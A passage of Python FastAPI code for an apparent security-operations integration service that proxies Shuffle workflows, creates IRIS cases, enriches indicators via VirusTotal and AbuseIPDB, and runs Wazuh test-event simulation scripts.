  622. response_model=ApiResponse,
  623. summary="Shuffle health",
  624. description="Check Shuffle backend health endpoint through adapter connectivity.",
  625. )
  626. async def shuffle_health() -> ApiResponse:
  627. try:
  628. result = await shuffle_adapter.health()
  629. except Exception as exc:
  630. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  631. return ApiResponse(data={"shuffle": result})
  632. @app.get(
  633. "/shuffle/auth-test",
  634. response_model=ApiResponse,
  635. summary="Shuffle auth test",
  636. description="Validate Shuffle API key authentication.",
  637. )
  638. async def shuffle_auth_test() -> ApiResponse:
  639. try:
  640. result = await shuffle_adapter.auth_test()
  641. except Exception as exc:
  642. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  643. return ApiResponse(data={"shuffle": result})
  644. @app.post(
  645. "/shuffle/login",
  646. response_model=ApiResponse,
  647. summary="Shuffle login",
  648. description="Login to Shuffle with username/password and return auth response.",
  649. )
  650. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  651. try:
  652. result = await shuffle_adapter.login(payload.username, payload.password)
  653. except Exception as exc:
  654. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  655. return ApiResponse(data={"shuffle": result})
  656. @app.post(
  657. "/shuffle/generate-apikey",
  658. response_model=ApiResponse,
  659. summary="Generate Shuffle API key",
  660. description="Login using provided or configured credentials and generate a Shuffle API key.",
  661. )
  662. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  663. username = payload.username if payload else settings.shuffle_username
  664. password = payload.password if payload else settings.shuffle_password
  665. if not username or not password:
  666. raise HTTPException(
  667. status_code=400,
  668. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  669. )
  670. try:
  671. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  672. except Exception as exc:
  673. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  674. return ApiResponse(data={"shuffle": result})
  675. @app.get(
  676. "/shuffle/workflows",
  677. response_model=ApiResponse,
  678. summary="List Shuffle workflows",
  679. description="List available workflows in Shuffle using configured API key.",
  680. )
  681. async def shuffle_workflows() -> ApiResponse:
  682. try:
  683. result = await shuffle_adapter.list_workflows()
  684. except Exception as exc:
  685. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  686. return ApiResponse(data={"shuffle": result})
  687. @app.get(
  688. "/shuffle/workflows/{workflow_id}",
  689. response_model=ApiResponse,
  690. summary="Get Shuffle workflow",
  691. description="Get a single Shuffle workflow definition by workflow ID.",
  692. )
  693. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  694. try:
  695. result = await shuffle_adapter.get_workflow(workflow_id)
  696. except Exception as exc:
  697. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  698. return ApiResponse(data={"shuffle": result})
  699. @app.post(
  700. "/shuffle/workflows/{workflow_id}/execute",
  701. response_model=ApiResponse,
  702. summary="Execute Shuffle workflow",
  703. description="Execute a specific Shuffle workflow with custom JSON payload.",
  704. )
  705. async def shuffle_workflow_execute(
  706. workflow_id: str, payload: dict[str, object]
  707. ) -> ApiResponse:
  708. try:
  709. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  710. except Exception as exc:
  711. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  712. return ApiResponse(data={"shuffle": result})
  713. @app.get(
  714. "/shuffle/apps",
  715. response_model=ApiResponse,
  716. summary="List Shuffle apps",
  717. description="List installed/available Shuffle apps from app API.",
  718. )
  719. async def shuffle_apps() -> ApiResponse:
  720. try:
  721. result = await shuffle_adapter.list_apps()
  722. except Exception as exc:
  723. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  724. return ApiResponse(data={"shuffle": result})
  725. @app.post(
  726. "/shuffle/proxy",
  727. response_model=ApiResponse,
  728. summary="Proxy request to Shuffle API",
  729. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  730. )
  731. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  732. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  733. try:
  734. result = await shuffle_adapter.proxy(
  735. method=payload.method,
  736. path=path,
  737. params=payload.params,
  738. payload=payload.payload,
  739. )
  740. except Exception as exc:
  741. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  742. return ApiResponse(data={"shuffle": result})
  743. @app.post(
  744. "/action/create-iris-case",
  745. response_model=ApiResponse,
  746. summary="Create IRIS case (action)",
  747. description="Create an IRIS case using action payload fields and defaults.",
  748. )
  749. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  750. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  751. case_payload = {
  752. "case_name": payload.title,
  753. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  754. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  755. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  756. }
  757. try:
  758. iris_result = await iris_adapter.create_case(case_payload)
  759. except Exception as exc:
  760. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  761. return ApiResponse(data={"iris": iris_result})
  762. @app.post(
  763. "/iris/tickets",
  764. response_model=ApiResponse,
  765. summary="Create IRIS ticket",
  766. description="Create an IRIS case/ticket directly using ticket request model.",
  767. )
  768. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  769. case_payload = {
  770. "case_name": payload.title,
  771. "case_description": payload.description,
  772. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  773. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  774. }
  775. if payload.payload:
  776. case_payload.update(payload.payload)
  777. try:
  778. iris_result = await iris_adapter.create_case(case_payload)
  779. except Exception as exc:
  780. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  781. return ApiResponse(data={"iris": iris_result})
  782. @app.get(
  783. "/iris/tickets",
  784. response_model=ApiResponse,
  785. summary="List IRIS tickets",
  786. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  787. )
  788. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  789. try:
  790. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  791. except Exception as exc:
  792. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  793. return ApiResponse(data={"iris": iris_result})
  794. def _build_vt_ioc_result(
  795. vt: dict[str, object],
  796. ioc_type: str,
  797. ioc_value: str,
  798. malicious_threshold: int,
  799. suspicious_threshold: int,
  800. ) -> tuple[dict[str, object], bool, str, float]:
  801. stats = (
  802. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  803. if isinstance(vt, dict)
  804. else None
  805. ) or {}
  806. malicious = int(stats.get("malicious", 0) or 0)
  807. suspicious = int(stats.get("suspicious", 0) or 0)
  808. harmless = int(stats.get("harmless", 0) or 0)
  809. undetected = int(stats.get("undetected", 0) or 0)
  810. total = malicious + suspicious + harmless + undetected
  811. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  812. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  813. severity = "low"
  814. if malicious >= 5 or suspicious >= 10:
  815. severity = "critical"
  816. elif malicious >= 2 or suspicious >= 5:
  817. severity = "high"
  818. elif malicious >= 1 or suspicious >= 1:
  819. severity = "medium"
  820. reason = (
  821. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  822. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  823. )
  824. result: dict[str, object] = {
  825. "ioc_type": ioc_type,
  826. "ioc_value": ioc_value,
  827. "matched": matched,
  828. "severity": severity,
  829. "confidence": confidence,
  830. "reason": reason,
  831. "providers": {
  832. "virustotal": {
  833. "stats": stats,
  834. }
  835. },
  836. "raw": {
  837. "virustotal": vt,
  838. },
  839. }
  840. return result, matched, severity, confidence
  841. def _build_abuseipdb_ioc_result(
  842. abuse: dict[str, object],
  843. ioc_value: str,
  844. confidence_threshold: int = 50,
  845. ) -> tuple[dict[str, object], bool, str, float]:
  846. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  847. score = int(data.get("abuseConfidenceScore", 0) or 0)
  848. total_reports = int(data.get("totalReports", 0) or 0)
  849. matched = score >= confidence_threshold
  850. severity = "low"
  851. if score >= 90:
  852. severity = "critical"
  853. elif score >= 70:
  854. severity = "high"
  855. elif score >= 30:
  856. severity = "medium"
  857. confidence = round(score / 100.0, 4)
  858. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  859. result: dict[str, object] = {
  860. "ioc_type": "ip",
  861. "ioc_value": ioc_value,
  862. "matched": matched,
  863. "severity": severity,
  864. "confidence": confidence,
  865. "reason": reason,
  866. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  867. }
  868. return result, matched, severity, confidence
  869. def _extract_first_array(payload: object) -> list[object]:
  870. if isinstance(payload, list):
  871. return payload
  872. if not isinstance(payload, dict):
  873. return []
  874. preferred_keys = [
  875. "items",
  876. "results",
  877. "workflows",
  878. "apps",
  879. "affected_items",
  880. "data",
  881. ]
  882. for key in preferred_keys:
  883. value = payload.get(key)
  884. if isinstance(value, list):
  885. return value
  886. for value in payload.values():
  887. extracted = _extract_first_array(value)
  888. if extracted:
  889. return extracted
  890. return []
# Maps the public script aliases accepted by the sim-log API onto the shell
# script filenames that emit Wazuh test events (resolved under
# SIM_SCRIPTS_DIR by _build_sim_command).
SIM_SCRIPT_MAP: dict[str, str] = {
    "fortigate": "send-wazuh-fortigate-test-events.sh",
    "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
    "cisco": "send-wazuh-cisco-test-events.sh",
    "proposal_required": "send-wazuh-proposal-required-events.sh",
    "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
    "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
    "wazuh_test": "send-wazuh-test-events.sh",
}
  900. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  901. script_name = SIM_SCRIPT_MAP[payload.script]
  902. script_path = SIM_SCRIPTS_DIR / script_name
  903. count = max(1, int(payload.count))
  904. delay = max(0.0, float(payload.delay_seconds))
  905. if payload.script == "endpoint":
  906. cmd = [
  907. "/bin/bash",
  908. str(script_path),
  909. payload.target or "all",
  910. payload.scenario or "all",
  911. str(count),
  912. str(delay),
  913. ]
  914. else:
  915. cmd = [
  916. "/bin/bash",
  917. str(script_path),
  918. payload.target or "all",
  919. str(count),
  920. str(delay),
  921. ]
  922. if payload.forever:
  923. cmd.append("--forever")
  924. return cmd
  925. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  926. process = run.get("process")
  927. poll_code = process.poll() if process else None
  928. return_code = run.get("return_code")
  929. if poll_code is not None and return_code is None:
  930. run["return_code"] = poll_code
  931. return_code = poll_code
  932. return {
  933. "run_id": run_id,
  934. "script": run.get("script"),
  935. "target": run.get("target"),
  936. "scenario": run.get("scenario"),
  937. "count": run.get("count"),
  938. "delay_seconds": run.get("delay_seconds"),
  939. "forever": run.get("forever"),
  940. "pid": run.get("pid"),
  941. "cmd": run.get("cmd"),
  942. "started_at": run.get("started_at"),
  943. "stopped_at": run.get("stopped_at"),
  944. "running": bool(process and process.poll() is None),
  945. "return_code": return_code,
  946. "log_file": run.get("log_file"),
  947. }
  948. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  949. line_limit = max(1, min(int(limit), 1000))
  950. lines: deque[str] = deque(maxlen=line_limit)
  951. try:
  952. with path.open("r", encoding="utf-8", errors="replace") as handle:
  953. for line in handle:
  954. lines.append(line.rstrip("\n"))
  955. except FileNotFoundError:
  956. return []
  957. return list(lines)
  958. def _safe_query_token(value: object) -> str | None:
  959. text = str(value or "").strip()
  960. if not text:
  961. return None
  962. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  963. return None
  964. return text
  965. def _parse_iso_datetime(value: object) -> datetime | None:
  966. text = str(value or "").strip()
  967. if not text:
  968. return None
  969. if text.endswith("Z"):
  970. text = text[:-1] + "+00:00"
  971. try:
  972. parsed = datetime.fromisoformat(text)
  973. except ValueError:
  974. return None
  975. if parsed.tzinfo is None:
  976. parsed = parsed.replace(tzinfo=timezone.utc)
  977. return parsed.astimezone(timezone.utc)
def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
    """Build Lucene query clauses to find events emitted by a simulation run.

    Always anchors on the soc_mvp_test marker, then adds script-specific
    (and, where safe, target-specific) clauses. Target values that fail
    _safe_query_token are never interpolated into the query.
    """
    script = str(run.get("script") or "").strip().lower()
    target = str(run.get("target") or "all").strip()
    scenario = str(run.get("scenario") or "all").strip().lower()
    target_token = _safe_query_token(target)
    _ = scenario  # scenario is read but not currently used for filtering
    # Base clause: every simulation event carries the soc_mvp_test marker.
    clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
    if script == "fortigate":
        clauses.append(
            "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
            "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
        )
        if target_token and target_token.lower() != "all":
            clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
    elif script == "endpoint":
        if target_token and target_token.lower() != "all":
            lowered = target_token.lower()
            # Known platform aliases get structured source/platform clauses;
            # anything else falls back to a plain substring match.
            if lowered in {"windows", "win"}:
                clauses.append(
                    "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                    "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
                )
            elif lowered in {"mac", "macos"}:
                clauses.append(
                    "(full_log:*source=mac* OR full_log:*source=mac_agent* "
                    "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
                )
            elif lowered == "linux":
                clauses.append(
                    "(full_log:*source=linux* OR full_log:*source=linux_agent* "
                    "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
                )
            else:
                clauses.append(f"full_log:*{target_token}*")
        else:
            # "all" targets: match any of the three endpoint platforms.
            clauses.append(
                "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
                "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
                "OR data.source:windows OR data.source:windows_agent "
                "OR data.source:mac OR data.source:mac_agent "
                "OR data.source:linux OR data.source:linux_agent)"
            )
    elif script == "cisco":
        clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
        # NOTE(review): this repeats the base soc_mvp_test clause — presumably
        # harmless (AND of identical clauses), but looks redundant; confirm.
        clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    else:
        # Unknown script names fall back to the bare marker substring.
        clauses.append("full_log:*soc_mvp_test=true*")
    return clauses
  1032. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  1033. if not isinstance(payload, dict):
  1034. return []
  1035. hits_root = payload.get("hits")
  1036. if not isinstance(hits_root, dict):
  1037. return []
  1038. hits = hits_root.get("hits")
  1039. if not isinstance(hits, list):
  1040. return []
  1041. result: list[dict[str, object]] = []
  1042. for hit in hits:
  1043. if isinstance(hit, dict):
  1044. result.append(hit)
  1045. return result
  1046. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  1047. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1048. source = source if isinstance(source, dict) else {}
  1049. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1050. agent = agent if isinstance(agent, dict) else {}
  1051. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  1052. decoder = decoder if isinstance(decoder, dict) else {}
  1053. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1054. data = data if isinstance(data, dict) else {}
  1055. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1056. rule = rule if isinstance(rule, dict) else {}
  1057. item: dict[str, object] = {
  1058. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1059. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1060. "agent_name": agent.get("name"),
  1061. "agent_id": agent.get("id"),
  1062. "decoder_name": decoder.get("name"),
  1063. "source": data.get("source"),
  1064. "event_type": data.get("event_type"),
  1065. "severity": data.get("severity"),
  1066. "rule_id": rule.get("id"),
  1067. "rule_description": rule.get("description"),
  1068. "full_log": source.get("full_log"),
  1069. }
  1070. if include_raw:
  1071. item["raw"] = source
  1072. return item
  1073. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1074. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1075. source = source if isinstance(source, dict) else {}
  1076. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1077. rule = rule if isinstance(rule, dict) else {}
  1078. rule_id = rule.get("id")
  1079. if rule_id in {None, ""}:
  1080. return None
  1081. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1082. agent = agent if isinstance(agent, dict) else {}
  1083. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1084. data = data if isinstance(data, dict) else {}
  1085. item: dict[str, object] = {
  1086. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1087. "rule_id": rule_id,
  1088. "rule_level": rule.get("level"),
  1089. "rule_description": rule.get("description"),
  1090. "rule_firedtimes": rule.get("firedtimes"),
  1091. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1092. "agent_name": agent.get("name"),
  1093. "full_log": source.get("full_log"),
  1094. }
  1095. if include_raw:
  1096. item["raw"] = source
  1097. return item
@app.post(
    "/ioc/enrich",
    response_model=ApiResponse,
    summary="IOC enrich",
    description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
)
async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
    """Fetch raw enrichment data for an IOC from the requested providers.

    No verdict scoring is applied; each provider's raw response is placed
    under result["providers"]. Both successes and failures are recorded via
    repo.add_ioc_trace; a provider failure aborts the request with HTTP 502.
    """
    # Normalize provider names so the membership checks below are
    # case/whitespace insensitive.
    providers = [p.lower().strip() for p in payload.providers]
    result: dict[str, object] = {
        "ioc_type": payload.ioc_type,
        "ioc_value": payload.ioc_value,
        "providers_requested": providers,
        "providers": {},
    }
    if "virustotal" in providers:
        try:
            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
            result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
        except Exception as exc:
            # Record the failed lookup before surfacing the upstream error.
            repo.add_ioc_trace(
                action="enrich",
                ioc_type=payload.ioc_type,
                ioc_value=payload.ioc_value,
                providers=providers,
                request_payload=payload.model_dump(mode="json"),
                response_payload={},
                error=str(exc),
            )
            raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
    if "abuseipdb" in providers:
        if payload.ioc_type != "ip":
            # AbuseIPDB only handles IP addresses; note the skip instead of failing.
            result["providers"] = {
                **(result.get("providers") or {}),
                "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
            }
        else:
            try:
                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
                result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
            except Exception as exc:
                repo.add_ioc_trace(
                    action="enrich",
                    ioc_type=payload.ioc_type,
                    ioc_value=payload.ioc_value,
                    providers=providers,
                    request_payload=payload.model_dump(mode="json"),
                    response_payload={},
                    error=str(exc),
                )
                raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
    # Trace the successful enrichment with the aggregate result attached.
    repo.add_ioc_trace(
        action="enrich",
        ioc_type=payload.ioc_type,
        ioc_value=payload.ioc_value,
        providers=providers,
        request_payload=payload.model_dump(mode="json"),
        response_payload=result,
    )
    return ApiResponse(data={"ioc": result})
@app.post(
    "/ioc/evaluate",
    response_model=ApiResponse,
    summary="IOC evaluate",
    description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
)
async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
    """Evaluate an IOC with the supported providers and aggregate a verdict.

    Queries VirusTotal and/or AbuseIPDB, builds a per-provider verdict, then
    aggregates: matched if any provider matched, confidence is the maximum,
    severity is the highest on the low<medium<high<critical scale. Raises
    HTTP 400 when no supported provider is requested and HTTP 502 when every
    requested provider fails; all outcomes are traced via repo.add_ioc_trace.
    """
    providers = [p.lower().strip() for p in payload.providers]
    supported = {"virustotal", "abuseipdb"}
    requested = [p for p in providers if p in supported]
    if not requested:
        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
    per_provider: dict[str, dict[str, object]] = {}
    errors: dict[str, str] = {}
    if "virustotal" in requested:
        try:
            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
            vt_result, _, _, _ = _build_vt_ioc_result(
                vt=vt,
                ioc_type=payload.ioc_type,
                ioc_value=payload.ioc_value,
                malicious_threshold=payload.malicious_threshold,
                suspicious_threshold=payload.suspicious_threshold,
            )
            per_provider["virustotal"] = vt_result
        except Exception as exc:
            # Collect the error; other providers may still produce a verdict.
            errors["virustotal"] = str(exc)
    if "abuseipdb" in requested:
        if payload.ioc_type != "ip":
            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
        else:
            try:
                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
                    abuse=abuse,
                    ioc_value=payload.ioc_value,
                    confidence_threshold=50,
                )
                per_provider["abuseipdb"] = abuse_result
            except Exception as exc:
                errors["abuseipdb"] = str(exc)
    if not per_provider:
        # Every requested provider failed: trace the failure and bail out.
        repo.add_ioc_trace(
            action="evaluate",
            ioc_type=payload.ioc_type,
            ioc_value=payload.ioc_value,
            providers=requested,
            request_payload=payload.model_dump(mode="json"),
            response_payload={},
            error=str(errors),
        )
        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
    # aggregate decision (max confidence/severity, matched if any provider matched)
    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
    matched = any(bool(r.get("matched")) for r in per_provider.values())
    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
    if errors:
        # Partial failures are appended to the reason for transparency.
        reason_parts.append(f"errors={errors}")
    ioc_result = {
        "ioc_type": payload.ioc_type,
        "ioc_value": payload.ioc_value,
        "matched": matched,
        "severity": severity,
        "confidence": round(confidence, 4),
        "reason": " | ".join(reason_parts),
        "providers": per_provider,
    }
    repo.add_ioc_trace(
        action="evaluate",
        ioc_type=payload.ioc_type,
        ioc_value=payload.ioc_value,
        providers=providers,
        request_payload=payload.model_dump(mode="json"),
        response_payload=ioc_result,
        matched=matched,
        severity=severity,
        confidence=float(ioc_result["confidence"]),
    )
    return ApiResponse(data={"ioc": ioc_result})
@app.post(
    "/ioc/upload-file",
    response_model=ApiResponse,
    summary="Upload file to VirusTotal",
    description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
)
async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
    """Upload a file sample to VirusTotal and return the raw upload response.

    Rejects empty uploads with HTTP 400, surfaces upstream failures as
    HTTP 502, and records both outcomes through repo.add_ioc_trace.
    """
    content = await file.read()
    if not content:
        raise HTTPException(status_code=400, detail="Uploaded file is empty")
    try:
        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
    except Exception as exc:
        # Record the failed upload before surfacing the upstream error.
        repo.add_ioc_trace(
            action="upload_file",
            ioc_type="hash",
            ioc_value=file.filename or "<unknown>",
            providers=["virustotal"],
            request_payload={"filename": file.filename, "size": len(content)},
            response_payload={},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
    repo.add_ioc_trace(
        action="upload_file",
        ioc_type="hash",
        ioc_value=file.filename or "<unknown>",
        providers=["virustotal"],
        request_payload={"filename": file.filename, "size": len(content)},
        # Non-dict responses are wrapped so the trace stays JSON-serializable.
        response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
    )
    return ApiResponse(data={"virustotal": vt_upload})
@app.get(
    "/ioc/analysis/{analysis_id}",
    response_model=ApiResponse,
    summary="Get VirusTotal analysis",
    description="Fetch analysis status/details from VirusTotal by analysis ID.",
)
async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
    """Fetch a VirusTotal analysis by ID and return its raw response.

    Upstream failures surface as HTTP 502; both success and failure are
    recorded through repo.add_ioc_trace.
    """
    try:
        vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
    except Exception as exc:
        # Record the failed fetch before surfacing the upstream error.
        repo.add_ioc_trace(
            action="analysis",
            ioc_type="hash",
            ioc_value=analysis_id,
            providers=["virustotal"],
            request_payload={"analysis_id": analysis_id},
            response_payload={},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
    repo.add_ioc_trace(
        action="analysis",
        ioc_type="hash",
        ioc_value=analysis_id,
        providers=["virustotal"],
        request_payload={"analysis_id": analysis_id},
        # Non-dict responses are wrapped so the trace stays JSON-serializable.
        response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
    )
    return ApiResponse(data={"virustotal": vt_analysis})
@app.post(
    "/ioc/evaluate-file",
    response_model=ApiResponse,
    summary="Evaluate uploaded file IOC",
    description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
)
async def ioc_evaluate_file(
    file: UploadFile = File(...),
    malicious_threshold: int = 1,
    suspicious_threshold: int = 3,
    poll_timeout_seconds: int = 30,
    poll_interval_seconds: int = 2,
) -> ApiResponse:
    """Upload a file to VirusTotal, poll the analysis, and return an IOC verdict.

    Flow: upload -> extract analysis ID -> poll until ``status == "completed"``
    or the timeout budget is spent -> read the sha256 from analysis metadata ->
    fetch the full file report -> build the verdict via ``_build_vt_ioc_result``.
    Every failure path and the final result are persisted as IOC trace rows.

    Raises:
        HTTPException 400: uploaded file is empty.
        HTTPException 502: any VirusTotal call fails, or the upload/analysis
            response is missing the analysis ID or file hash.
    """
    content = await file.read()
    if not content:
        raise HTTPException(status_code=400, detail="Uploaded file is empty")
    try:
        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
    except Exception as exc:
        # Record the failed upload attempt before surfacing the upstream error.
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=file.filename or "<unknown>",
            providers=["virustotal"],
            request_payload={"filename": file.filename, "size": len(content)},
            response_payload={},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
    # VT v3 upload responses carry the analysis ID at data.id — TODO confirm
    # against the adapter's response shape.
    analysis_id = (
        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
        or ""
    )
    if not analysis_id:
        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
    # Clamp polling knobs so a zero/negative value cannot spin or divide the budget oddly.
    timeout = max(1, poll_timeout_seconds)
    interval = max(1, poll_interval_seconds)
    elapsed = 0
    analysis: dict[str, object] = {}
    # Poll until completed or the timeout budget is exhausted; the last fetched
    # analysis (even if incomplete) is used below.
    while elapsed <= timeout:
        analysis = await virustotal_adapter.get_analysis(analysis_id)
        status = (
            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
            if isinstance(analysis, dict)
            else None
        )
        if status == "completed":
            break
        await asyncio.sleep(interval)
        elapsed += interval
    # Once VT has processed the upload, the file hash appears under meta.file_info.
    sha256 = (
        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
        if isinstance(analysis, dict)
        else None
    )
    if not sha256:
        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
    try:
        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
    except Exception as exc:
        # Keep the upload/analysis payloads in the trace so the failure is reproducible.
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=str(sha256),
            providers=["virustotal"],
            request_payload={"filename": file.filename, "analysis_id": analysis_id},
            response_payload={"upload": vt_upload, "analysis": analysis},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
        vt=vt_file,
        ioc_type="hash",
        ioc_value=str(sha256),
        malicious_threshold=malicious_threshold,
        suspicious_threshold=suspicious_threshold,
    )
    # Enrich the verdict with request context before persisting / returning it.
    ioc_result["analysis_id"] = analysis_id
    ioc_result["filename"] = file.filename
    repo.add_ioc_trace(
        action="evaluate_file",
        ioc_type="hash",
        ioc_value=str(sha256),
        providers=["virustotal"],
        request_payload={"filename": file.filename, "analysis_id": analysis_id},
        response_payload={
            "upload": vt_upload,
            "analysis": analysis,
            "ioc": ioc_result,
        },
        matched=matched,
        severity=severity,
        confidence=confidence,
    )
    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
